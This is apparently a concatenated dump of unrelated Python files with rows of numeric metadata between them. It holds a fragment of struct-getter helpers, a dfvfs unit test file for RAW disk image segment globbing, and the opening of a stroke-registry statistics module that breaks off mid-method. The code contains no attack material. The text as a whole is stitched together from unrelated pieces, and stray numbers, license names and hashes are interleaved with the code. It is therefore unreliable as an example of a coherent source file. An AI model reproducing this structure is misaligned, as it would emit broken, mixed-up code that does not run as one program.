def _get_struct_B():
global _struct_B
if _struct_B is None:
_struct_B = struct.Struct("<B")
return _struct_B
_struct_d4qh = None
def _get_struct_d4qh():
global _struct_d4qh
if _struct_d4qh is None:
_struct_d4qh = struct.Struct("<d4qh")
return _struct_d4qh
_struct_h3I = None
def _get_struct_h3I():
global _struct_h3I
if _struct_h3I is None:
_struct_h3I = struct.Struct("<h3I")
return _struct_h3I
_struct_BI = None
def _get_struct_BI():
global _struct_BI
if _struct_BI is None:
_struct_BI = struct.Struct("<BI")
return _struct_BI
_struct_3I = None
def _get_struct_3I():
global _struct_3I
if _struct_3I is None:
_struct_3I = struct.Struct("<3I")
return _struct_3I
_struct_2I = None
def _get_struct_2I():
global _struct_2I
if _struct_2I is None:
_struct_2I = struct.Struct("<2I")
return _struct_2I
| 41.428413
| 246
| 0.63943
| 5,149
| 37,327
| 4.398524
| 0.073412
| 0.06994
| 0.054398
| 0.043801
| 0.78369
| 0.781482
| 0.765233
| 0.765233
| 0.745717
| 0.741213
| 0
| 0.011961
| 0.218287
| 37,327
| 900
| 247
| 41.474444
| 0.764214
| 0.038123
| 0
| 0.806569
| 1
| 0.001217
| 0.203519
| 0.051167
| 0
| 0
| 0.00028
| 0
| 0
| 1
| 0.015815
| false
| 0
| 0.009732
| 0
| 0.046229
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
614f16ac6495c02324492c1a2db96f18b5c7f6dc
| 20,681
|
py
|
Python
|
tests/lib/raw.py
|
Defense-Cyber-Crime-Center/dfvfs
|
da2ccbc4c989ced5ad651057bd8f5a4b18af6d37
|
[
"Apache-2.0"
] | 2
|
2016-02-18T12:46:26.000Z
|
2022-03-13T03:05:05.000Z
|
tests/lib/raw.py
|
Defense-Cyber-Crime-Center/dfvfs
|
da2ccbc4c989ced5ad651057bd8f5a4b18af6d37
|
[
"Apache-2.0"
] | null | null | null |
tests/lib/raw.py
|
Defense-Cyber-Crime-Center/dfvfs
|
da2ccbc4c989ced5ad651057bd8f5a4b18af6d37
|
[
"Apache-2.0"
] | 5
|
2016-12-18T08:05:39.000Z
|
2019-11-19T21:18:00.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tests for the storage media RAW image support helper functions."""
import unittest
from dfvfs.lib import raw
from dfvfs.lib import definitions
from dfvfs.path import fake_path_spec
from dfvfs.path import raw_path_spec
from dfvfs.resolver import context
from dfvfs.vfs import fake_file_system
class GlobRawFileTest(unittest.TestCase):
"""The unit test for the storage media RAW image file glob functionality."""
  def _BuildFileFakeFileSystem(
      self, segment_filenames, segment_file_path_specs):
    """Builds a fake file system containing storage media RAW segment files.

    Args:
      segment_filenames: a list of segment filenames.
      segment_file_path_specs: a list to store the segment file path
                               specifications in (appended to in place).

    Returns:
      The fake file system (instance of dfvfs.FakeFileSystem).
    """
    resolver_context = context.Context()
    file_system = fake_file_system.FakeFileSystem(resolver_context)

    file_system.AddFileEntry(
        u'/', file_entry_type=definitions.FILE_ENTRY_TYPE_DIRECTORY)

    # Each segment file is added at the root and its path specification is
    # recorded so callers can compare against the glob results.
    for segment_filename in segment_filenames:
      path = u'/{0:s}'.format(segment_filename)
      file_system.AddFileEntry(path)
      segment_file_path_specs.append(fake_path_spec.FakePathSpec(location=path))

    return file_system
def testGlobRawSinglecExtension(self):
"""Test the glob function for a RAW single extension scheme."""
# Test single segment file: dd.
segment_filenames = [u'ímynd.dd']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
path_spec = fake_path_spec.FakePathSpec(location=u'/ímynd.dd')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
# Test single segment file: dmg.
segment_filenames = [u'image.dmg']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
path_spec = fake_path_spec.FakePathSpec(location=u'/image.dmg')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
# Test single segment file: img.
segment_filenames = [u'image.img']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
path_spec = fake_path_spec.FakePathSpec(location=u'/image.img')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
# Test single segment file: raw.
segment_filenames = [u'image.raw']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
path_spec = fake_path_spec.FakePathSpec(location=u'/image.raw')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
def testGlobRawAlphabeticalExtension(self):
"""Test the glob function for a RAW alphabetical extension scheme."""
segment_filenames = [u'image.aaa']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
# Test single segment file: aaa.
path_spec = fake_path_spec.FakePathSpec(location=u'/image.aaa')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
# Test non exiting segment file: aaa.
expected_segment_file_path_specs = []
path_spec = fake_path_spec.FakePathSpec(location=u'/bogus.aaa')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
# Test multiple segment files: aaa-aak.
segment_filenames = [
u'image.aaa', u'image.aab', u'image.aac', u'image.aad', u'image.aae',
u'image.aaf', u'image.aag', u'image.aah', u'image.aai', u'image.aaj',
u'image.aak']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
path_spec = fake_path_spec.FakePathSpec(location=u'/image.aaa')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
# Test multiple segment files: AAA-AAk.
segment_filenames = [
u'image.AAA', u'image.AAB', u'image.AAC', u'image.AAD', u'image.AAE',
u'image.AAF', u'image.AAG', u'image.AAH', u'image.AAI', u'image.AAJ',
u'image.AAK']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
path_spec = fake_path_spec.FakePathSpec(location=u'/image.AAA')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
def testGlobRawAlphabeticalSuffix(self):
  """Test the glob function for a RAW alphabetical suffix scheme."""

  def _CheckGlobResults(file_system, location, expected_path_specs):
    # Wrap the location in a fake path spec, layer a RAW path spec on
    # top of it, glob and compare the result with the expected path specs.
    test_path_spec = fake_path_spec.FakePathSpec(location=location)
    test_path_spec = raw_path_spec.RawPathSpec(parent=test_path_spec)
    globbed_path_specs = raw.RawGlobPathSpec(file_system, test_path_spec)

    self.assertEqual(len(globbed_path_specs), len(expected_path_specs))
    self.assertEqual(globbed_path_specs, expected_path_specs)

  # Test single segment file: aaa.
  expected_path_specs = []
  file_system = self._BuildFileFakeFileSystem(
      [u'imageaaa'], expected_path_specs)
  _CheckGlobResults(file_system, u'/imageaaa', expected_path_specs)

  # Test non existing segment file: aaa.
  _CheckGlobResults(file_system, u'/bogusaaa', [])

  # Test multiple segment files: aaa-aak.
  segment_filenames = [
      u'imageaa{0:s}'.format(letter) for letter in u'abcdefghijk']
  expected_path_specs = []
  file_system = self._BuildFileFakeFileSystem(
      segment_filenames, expected_path_specs)
  _CheckGlobResults(file_system, u'/imageaaa', expected_path_specs)

  # Test multiple segment files: AAA-AAK.
  segment_filenames = [
      u'imageAA{0:s}'.format(letter) for letter in u'ABCDEFGHIJK']
  expected_path_specs = []
  file_system = self._BuildFileFakeFileSystem(
      segment_filenames, expected_path_specs)
  _CheckGlobResults(file_system, u'/imageAAA', expected_path_specs)
def testGlobRawNumericExtension(self):
  """Test the glob function for a RAW numeric extension scheme."""

  def _CheckGlobResults(file_system, location, expected_path_specs):
    # Wrap the location in a fake path spec, layer a RAW path spec on
    # top of it, glob and compare the result with the expected path specs.
    test_path_spec = fake_path_spec.FakePathSpec(location=location)
    test_path_spec = raw_path_spec.RawPathSpec(parent=test_path_spec)
    globbed_path_specs = raw.RawGlobPathSpec(file_system, test_path_spec)

    self.assertEqual(len(globbed_path_specs), len(expected_path_specs))
    self.assertEqual(globbed_path_specs, expected_path_specs)

  # Test single segment file: 000.
  expected_path_specs = []
  file_system = self._BuildFileFakeFileSystem(
      [u'image.000'], expected_path_specs)
  _CheckGlobResults(file_system, u'/image.000', expected_path_specs)

  # Test non existing segment file: 000.
  _CheckGlobResults(file_system, u'/bogus.000', [])

  # Test multiple segment files: 000-010.
  segment_filenames = [u'image.{0:03d}'.format(index) for index in range(11)]
  expected_path_specs = []
  file_system = self._BuildFileFakeFileSystem(
      segment_filenames, expected_path_specs)
  _CheckGlobResults(file_system, u'/image.000', expected_path_specs)

  # Test multiple segment files: 001-010.
  segment_filenames = [
      u'image.{0:03d}'.format(index) for index in range(1, 11)]
  expected_path_specs = []
  file_system = self._BuildFileFakeFileSystem(
      segment_filenames, expected_path_specs)
  _CheckGlobResults(file_system, u'/image.001', expected_path_specs)

  # Test multiple segment files: 1-10.
  segment_filenames = [u'image.{0:d}'.format(index) for index in range(1, 11)]
  expected_path_specs = []
  file_system = self._BuildFileFakeFileSystem(
      segment_filenames, expected_path_specs)
  _CheckGlobResults(file_system, u'/image.1', expected_path_specs)
def testGlobRawNumericSuffix(self):
  """Test the glob function for a RAW numeric suffix scheme."""

  def _CheckGlobResults(file_system, location, expected_path_specs):
    # Wrap the location in a fake path spec, layer a RAW path spec on
    # top of it, glob and compare the result with the expected path specs.
    test_path_spec = fake_path_spec.FakePathSpec(location=location)
    test_path_spec = raw_path_spec.RawPathSpec(parent=test_path_spec)
    globbed_path_specs = raw.RawGlobPathSpec(file_system, test_path_spec)

    self.assertEqual(len(globbed_path_specs), len(expected_path_specs))
    self.assertEqual(globbed_path_specs, expected_path_specs)

  # Test single segment file: 1.
  expected_path_specs = []
  file_system = self._BuildFileFakeFileSystem(
      [u'image1'], expected_path_specs)
  _CheckGlobResults(file_system, u'/image1', expected_path_specs)

  # Test non existing segment file: 1.
  _CheckGlobResults(file_system, u'/bogus1', [])

  # Test multiple segment files: 0-10.
  segment_filenames = [u'image{0:d}'.format(index) for index in range(11)]
  expected_path_specs = []
  file_system = self._BuildFileFakeFileSystem(
      segment_filenames, expected_path_specs)
  _CheckGlobResults(file_system, u'/image0', expected_path_specs)

  # Test multiple segment files: 1-10.
  segment_filenames = [u'image{0:d}'.format(index) for index in range(1, 11)]
  expected_path_specs = []
  file_system = self._BuildFileFakeFileSystem(
      segment_filenames, expected_path_specs)
  _CheckGlobResults(file_system, u'/image1', expected_path_specs)

  # Test multiple segment files: 001-010.
  segment_filenames = [
      u'image{0:03d}'.format(index) for index in range(1, 11)]
  expected_path_specs = []
  file_system = self._BuildFileFakeFileSystem(
      segment_filenames, expected_path_specs)
  _CheckGlobResults(file_system, u'/image001', expected_path_specs)
def testGlobRawAsbExtension(self):
  """Test the glob function for a RAW ASB extension scheme."""

  def _CheckGlobResults(file_system, location, expected_path_specs):
    # Wrap the location in a fake path spec, layer a RAW path spec on
    # top of it, glob and compare the result with the expected path specs.
    test_path_spec = fake_path_spec.FakePathSpec(location=location)
    test_path_spec = raw_path_spec.RawPathSpec(parent=test_path_spec)
    globbed_path_specs = raw.RawGlobPathSpec(file_system, test_path_spec)

    self.assertEqual(len(globbed_path_specs), len(expected_path_specs))
    self.assertEqual(globbed_path_specs, expected_path_specs)

  # Test single segment file: 001.
  expected_path_specs = []
  file_system = self._BuildFileFakeFileSystem(
      [u'image001.asb'], expected_path_specs)
  _CheckGlobResults(file_system, u'/image001.asb', expected_path_specs)

  # Test non existing segment file: 001.
  _CheckGlobResults(file_system, u'/bogus000.asb', [])

  # Test multiple segment files: 001-010.
  segment_filenames = [
      u'image{0:03d}.asb'.format(index) for index in range(1, 11)]
  expected_path_specs = []
  file_system = self._BuildFileFakeFileSystem(
      segment_filenames, expected_path_specs)
  _CheckGlobResults(file_system, u'/image001.asb', expected_path_specs)
def testGlobRawVmdkExtension(self):
  """Test the glob function for a RAW VMDK extension scheme."""

  def _CheckGlobResults(file_system, location, expected_path_specs):
    # Wrap the location in a fake path spec, layer a RAW path spec on
    # top of it, glob and compare the result with the expected path specs.
    test_path_spec = fake_path_spec.FakePathSpec(location=location)
    test_path_spec = raw_path_spec.RawPathSpec(parent=test_path_spec)
    globbed_path_specs = raw.RawGlobPathSpec(file_system, test_path_spec)

    self.assertEqual(len(globbed_path_specs), len(expected_path_specs))
    self.assertEqual(globbed_path_specs, expected_path_specs)

  # Test single segment file: 001.
  expected_path_specs = []
  file_system = self._BuildFileFakeFileSystem(
      [u'image-f001.vmdk'], expected_path_specs)
  _CheckGlobResults(file_system, u'/image-f001.vmdk', expected_path_specs)

  # Test non existing segment file: 001.
  _CheckGlobResults(file_system, u'/bogus-f000.vmdk', [])

  # Test multiple segment files: 001-010.
  segment_filenames = [
      u'image-f{0:03d}.vmdk'.format(index) for index in range(1, 11)]
  expected_path_specs = []
  file_system = self._BuildFileFakeFileSystem(
      segment_filenames, expected_path_specs)
  _CheckGlobResults(file_system, u'/image-f001.vmdk', expected_path_specs)
# Run the test suite when this module is executed directly.
if __name__ == '__main__':
  unittest.main()
| 41.695565
| 80
| 0.748175
| 2,708
| 20,681
| 5.322378
| 0.067578
| 0.161035
| 0.201901
| 0.267814
| 0.883577
| 0.873794
| 0.856241
| 0.856241
| 0.849997
| 0.839034
| 0
| 0.017467
| 0.161211
| 20,681
| 495
| 81
| 41.779798
| 0.813397
| 0.093371
| 0
| 0.76
| 0
| 0
| 0.080914
| 0
| 0
| 0
| 0
| 0
| 0.16
| 1
| 0.022857
| false
| 0
| 0.02
| 0
| 0.048571
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
61633ee4b11cae72781872ad72fdde6424de3acc
| 240,628
|
py
|
Python
|
Calculation.py
|
atranel/resqdb
|
76b8a5089732ae63c867b734c5053908687122bc
|
[
"MIT"
] | null | null | null |
Calculation.py
|
atranel/resqdb
|
76b8a5089732ae63c867b734c5053908687122bc
|
[
"MIT"
] | null | null | null |
Calculation.py
|
atranel/resqdb
|
76b8a5089732ae63c867b734c5053908687122bc
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Thu Jul 09 13:28:05 2017
@author: Marie Jankujova
"""
import sys
import os
from datetime import datetime, time, date
import pandas as pd
import numpy as np
from numpy import inf
import pytz
import logging
import scipy.stats as st
from scipy.stats import sem, t
from scipy import mean
class FilterDataset:
""" The class filtrating the dataframe by date or by country.
:param df: the dataframe containing preprocessed data
:type df: dataframe
:param country: the country code to be included in the data
:type country: str
:param date1: the first date included in the filtered dataframe
:type date1: date
:param date2: the last date included in the filtered dataframe
:type date2: date
:param column: the column used as main for filtration
:type column: str
:param by_columns: True if data should be filtered by hospital and discharge date together
:type by_columns: boolean
"""
def __init__(self, df, country=None, date1=None, date2=None, column='DISCHARGE_DATE', by_columns=False):
debug = 'debug_' + datetime.now().strftime('%d-%m-%Y') + '.log'
log_file = os.path.join(os.getcwd(), debug)
logging.basicConfig(filename=log_file,
filemode='a',
format='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',
datefmt='%H:%M:%S',
level=logging.DEBUG)
self.fdf = df.copy()
self.country = country
self.date1 = date1
self.date2 = date2
if self.country is not None:
# Append "_" to the country code, because e.g. ES_MD was included in dataset for MD as well.
country = self.country + "_"
self.fdf = self._filter_by_country()
logging.info('FilterDataset: Data have been filtered for country {0}!'.format(self.country))
if self.date1 is not None and self.date2 is not None:
if not by_columns:
if column == 'DISCHARGE_DATE':
self.fdf = self._filter_by_date()
logging.info('FilterDataset: Data have been filtered for date {0} - {1}!'.format(self.date1, self.date2))
elif column == 'HOSPITAL_DATE':
self.fdf = self._filter_by_hospital_date()
logging.info('FilterDataset: Data have been filtered by hospital date for dates {} - {}!'.format(self.date1, self.date2))
else:
self.fdf = self._filter_by_hospital_and_discharge_date()
logging.info('FilterDataset: Data have been filtered by hospital or discharge date for dates {} - {}!'.format(self.date1, self.date2))
def _filter_by_country(self):
""" The function filtering dataframe by country.
:returns: df -- the dataframe including only rows containing in Protocol ID the country code
"""
df = self.fdf[self.fdf['Protocol ID'].str.startswith(self.country) == True].copy()
return df
def _filter_by_date(self):
""" The function filtering dataframe by discharge date.
:returns: df -- the dataframe including only rows where discharge date is in the period (date1, date2)
"""
df = self.fdf[(self.fdf['DISCHARGE_DATE'] >= self.date1) & (self.fdf['DISCHARGE_DATE'] <= self.date2)].copy()
return df
def _filter_by_hospital_date(self):
''' The function filtering dataframe by admission date.
:returns df: the dataframe including only rows where admission date is between these two days
'''
df = self.fdf[(self.fdf['HOSPITAL_DATE'] >= self.date1) & (self.fdf['HOSPITAL_DATE'] <= self.date2)].copy()
return df
def _filter_by_hospital_and_discharge_date(self):
''' The function filters dataframe by admission and discharge date. Eg. include patient if hospital date or discharge date are in the range.
'''
df = self.fdf[((self.fdf['HOSPITAL_DATE'] >= self.date1) & (self.fdf['HOSPITAL_DATE'] <= self.date2)) | ((self.fdf['DISCHARGE_DATE'] >= self.date1) & (self.fdf['DISCHARGE_DATE'] <= self.date2))].copy()
return df
class ComputeStats:
""" The class calculating the general statistics from the preprocessed and filtered data.
:param df: the dataframe containing preprocessed data
:type df: dataframe
:param country: the results for whole country included in the statistics
:type country: bool
:param country_code: the country code used in the names of output files
:type country_code: str
:param comparison: the value saying if it is comparative statistics
:type comparison: bool
:param patient_limit: the number of patients used as limit when evaluating angels awards (default is 30)
:type patiet_limit: int
:param period: the name of the period (default is None)
:type period: str
"""
def __init__(self, df, country = False, country_code = "", comparison=False, patient_limit=30, period=None, raw_data=None):
self.df = df.copy()
self.df.fillna(0, inplace=True)
self.patient_limit = patient_limit
self.period = period
self.raw_data = raw_data
# Rename 'RES-Q reports name' column to 'Site Name'
if 'ESO Angels name' in self.df.columns:
self.df.drop('Site Name', inplace=True, axis=1)
self.df.rename(columns={'ESO Angels name': 'Site Name'}, inplace=True)
def get_country_name(value):
""" The function returning the country name based on country code.
:returns: country_name -- name of the country
"""
if value == "UZB":
value = 'UZ'
country_name = pytz.country_names[value]
return country_name
#if comparison == False:
#self.df['Protocol ID'] = self.df.apply(lambda row: row['Protocol ID'].split()[2] if (len(row['Protocol ID'].split()) == 3) else row['Protocol ID'].split()[0], axis=1)
# uncomment if you want stats between countries and set comparison == True
# self.df['Protocol ID'] = self.df.apply(lambda x: x['Protocol ID'].split("_")[0], axis=1)
# If you want to compare, instead of Site Names will be Country names.
if comparison:
self.df['Protocol ID'] = self.df['Country']
self.df['Site Name'] = self.df['Country']
#if self.df['Protocol ID'].dtype == np.object:
#self.df['Site Name'] = self.df.apply(lambda x: get_country_name(x['Protocol ID']) if get_country_name(x['Protocol ID']) != "" else x['Protocol ID'], axis=1)
if (country):
country_df = self.df.copy()
#self.country_name = pytz.country_names[country_code]
# country['Protocol ID'] = self.country_name
#country['Site Name'] = self.country_name
country_df['Protocol ID'] = country_df['Country']
country_df['Site Name'] = country_df['Country']
self.df = pd.concat([self.df, country_df])
self._country_name = country_df['Country'].iloc[0]
else:
self._country_name = ""
self.statsDf = self.df.groupby(['Protocol ID', 'Site Name']).size().reset_index(name="Total Patients")
# self.statsDf['Site Name'] =
self.statsDf = self.statsDf[['Protocol ID', 'Site Name', 'Total Patients']]
self.statsDf['Median patient age'] = self.df.groupby(['Protocol ID']).AGE.agg(['median']).rename(columns={'median': 'Median patient age'})['Median patient age'].tolist()
# get patients with ischemic stroke (ISch) (1)
isch = self.df[self.df['STROKE_TYPE'].isin([1])]
self.statsDf['isch_patients'] = self._count_patients(dataframe=isch)
# get patients with ischemic stroke (IS), intracerebral hemorrhage (ICH), transient ischemic attack (TIA) or cerebral venous thrombosis (CVT) (1, 2, 3, 5)
is_ich_tia_cvt = self.df[self.df['STROKE_TYPE'].isin([1, 2, 3, 5])]
self.statsDf['is_ich_tia_cvt_patients'] = self._count_patients(dataframe=is_ich_tia_cvt)
# get patients with ischemic stroke (IS), intracerebral hemorrhage (ICH), or cerebral venous thrombosis (CVT) (1, 2, 5)
is_ich_cvt = self.df[self.df['STROKE_TYPE'].isin([1, 2, 5])]
self.statsDf['is_ich_cvt_patients'] = self._count_patients(dataframe=is_ich_cvt)
# Get dataframe with patients who had ischemic stroke (IS) or intracerebral hemorrhage (ICH)
is_ich = self.df[self.df['STROKE_TYPE'].isin([1,2])]
self.statsDf['is_ich_patients'] = self._count_patients(dataframe=is_ich)
# get patients with ischemic stroke (IS) and transient ischemic attack (TIA) (1, 3)
is_tia = self.df[self.df['STROKE_TYPE'].isin([1, 3])]
self.statsDf['is_tia_patients'] = self._count_patients(dataframe=is_tia)
# get patients with ischemic stroke (IS), intracerebral hemorrhage (ICH), subarachnoid hemorrhage (SAH) or cerebral venous thrombosis (CVT) (1, 2, 4, 5)
is_ich_sah_cvt = self.df[self.df['STROKE_TYPE'].isin([1, 2, 4, 5])]
self.statsDf['is_ich_sah_cvt_patients'] = self._count_patients(dataframe=is_ich_sah_cvt)
# get patients with ischemic stroke (IS), transient ischemic attack (TIA) or cerebral venous thrombosis (CVT) (1, 3, 5)
is_tia_cvt = self.df[self.df['STROKE_TYPE'].isin([1, 3, 5])]
self.statsDf['is_tia_cvt_patients'] = self._count_patients(dataframe=is_tia_cvt)
# get patients with cerebral venous thrombosis (CVT) (5)
cvt = self.df[self.df['STROKE_TYPE'].isin([5])]
self.statsDf['cvt_patients'] = self._count_patients(dataframe=cvt)
# get patients with intracerebral hemorrhage (ICH) and subarachnoid hemorrhage (SAH) (2, 4)
ich_sah = self.df[self.df['STROKE_TYPE'].isin([2, 4])]
self.statsDf['ich_sah_patients'] = self._count_patients(dataframe=ich_sah)
# get patients with intracerebral hemorrhage (ICH) (2)
ich = self.df[self.df['STROKE_TYPE'].isin([2])]
self.statsDf['ich_patients'] = self._count_patients(dataframe=ich)
# get patients with subarachnoid hemorrhage (SAH) (4)
sah = self.df[self.df['STROKE_TYPE'].isin([4])]
self.statsDf['sah_patients'] = self._count_patients(dataframe=sah)
# create subset with no referrals (RECANALIZATION_PROCEDURES != [5,6]) AND (HEMICRANIECTOMY != 3)
discharge_subset = self.df[~self.df['RECANALIZATION_PROCEDURES'].isin([5, 6]) & ~self.df['HEMICRANIECTOMY'].isin([3])]
self.statsDf['discharge_subset_patients'] = self._count_patients(dataframe=discharge_subset)
# Create discharge subset alive
discharge_subset_alive = self.df[~self.df['DISCHARGE_DESTINATION'].isin([5])]
self.statsDf['discharge_subset_alive_patients'] = self._count_patients(dataframe=discharge_subset_alive)
##########
# GENDER #
##########
self.tmp = self.df.groupby(['Protocol ID', 'GENDER']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="GENDER", value=2, new_column_name='# patients female')
self.statsDf['% patients female'] = self.statsDf.apply(lambda x: round(((x['# patients female']/x['Total Patients']) * 100), 2) if x['Total Patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="GENDER", value=1, new_column_name='# patients male')
self.statsDf['% patients male'] = self.statsDf.apply(lambda x: round(((x['# patients male']/x['Total Patients']) * 100), 2) if x['Total Patients'] > 0 else 0, axis=1)
# tag::prenotification[]
####################
# PRE-NOTIFICATION #
####################
pt_3_form_version = self.df.loc[self.df['crf_parent_name'] == 'F_RESQV20DEV_PT_3'].copy()
self.statsDf['pt_3_form_total_patients'] = self._count_patients(dataframe=pt_3_form_version)
if not pt_3_form_version.empty:
if country_code == 'PT':
# prenotification
column = 'PRENOTIFICATION'
if column in df.columns:
self.tmp = pt_3_form_version.groupby(['Protocol ID', column]).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name=column, value=1, new_column_name='# pre-notification - Yes')
self.statsDf['% pre-notification - Yes'] = self.statsDf.apply(lambda x: round(((x['# pre-notification - Yes']/x['pt_3_form_total_patients']) * 100), 2) if x['pt_3_form_total_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name=column, value=2, new_column_name='# pre-notification - No')
self.statsDf['% pre-notification - No'] = self.statsDf.apply(lambda x: round(((x['# pre-notification - No']/x['pt_3_form_total_patients']) * 100), 2) if x['pt_3_form_total_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name=column, value=3, new_column_name='# pre-notification - Not known')
self.statsDf['% pre-notification - Not known'] = self.statsDf.apply(lambda x: round(((x['# pre-notification - Not known']/x['pt_3_form_total_patients']) * 100), 2) if x['pt_3_form_total_patients'] > 0 else 0, axis=1)
del column
# end::prenotification[]
# tag::mrs_prior_stroke[]
####################
# MRS PRIOR STROKE #
####################
if country_code == 'PT':
# MRS prior to stroke
column = 'MRS_PRIOR_STROKE'
if column in df.columns:
# modify values to represent real values of mRS eg. 1 -> 0 etc.
pt_3_form_version.loc[:, 'ADJUSTED_MRS_PRIOR_STROKE'] = pt_3_form_version[column] - 1
# now our unknown is 7
prior_mrs_known = pt_3_form_version.loc[~pt_3_form_version[column].isin([7])].copy()
self.statsDf = self.statsDf.merge(prior_mrs_known.groupby(['Protocol ID']).ADJUSTED_MRS_PRIOR_STROKE.agg(['median']).rename(columns={'median': 'Median mRS prior to stroke'})['Median mRS prior to stroke'].reset_index(), how='outer')
del column
# end::mrs_prior_stroke[]
del pt_3_form_version
self.statsDf.drop(['pt_3_form_total_patients'], inplace=True, axis=1)
######################
# STROKE IN HOSPITAL #
######################
self.tmp = self.df.groupby(['Protocol ID', 'HOSPITAL_STROKE']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="HOSPITAL_STROKE", value=1, new_column_name='# patients having stroke in the hospital - Yes')
self.statsDf['% patients having stroke in the hospital - Yes'] = self.statsDf.apply(lambda x: round(((x['# patients having stroke in the hospital - Yes']/x['Total Patients']) * 100), 2) if x['Total Patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="HOSPITAL_STROKE", value=2, new_column_name='# patients having stroke in the hospital - No')
self.statsDf['% patients having stroke in the hospital - No'] = self.statsDf.apply(lambda x: round(((x['# patients having stroke in the hospital - No']/x['Total Patients']) * 100), 2) if x['Total Patients'] > 0 else 0, axis=1)
####################
# RECURRENT STROKE #
####################
self.tmp = self.df.groupby(['Protocol ID', 'RECURRENT_STROKE']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="RECURRENT_STROKE", value=-999, new_column_name='tmp')
self.statsDf = self._get_values_for_factors(column_name="RECURRENT_STROKE", value=1, new_column_name='# recurrent stroke - Yes')
self.statsDf['% recurrent stroke - Yes'] = self.statsDf.apply(lambda x: round(((x['# recurrent stroke - Yes']/(x['Total Patients'] - x['tmp'])) * 100), 2) if (x['Total Patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="RECURRENT_STROKE", value=2, new_column_name='# recurrent stroke - No')
self.statsDf['% recurrent stroke - No'] = self.statsDf.apply(lambda x: round(((x['# recurrent stroke - No']/(x['Total Patients'] - x['tmp'])) * 100), 2) if (x['Total Patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf.drop(['tmp'], inplace=True, axis=1)
###################
# DEPARTMENT TYPE #
###################
self.tmp = self.df.groupby(['Protocol ID', 'DEPARTMENT_TYPE']).size().to_frame('count').reset_index()
# Get patients from old version
self.statsDf = self._get_values_for_factors(column_name="DEPARTMENT_TYPE", value=-999, new_column_name='tmp')
self.statsDf = self._get_values_for_factors(column_name="DEPARTMENT_TYPE", value=1, new_column_name='# department type - neurology')
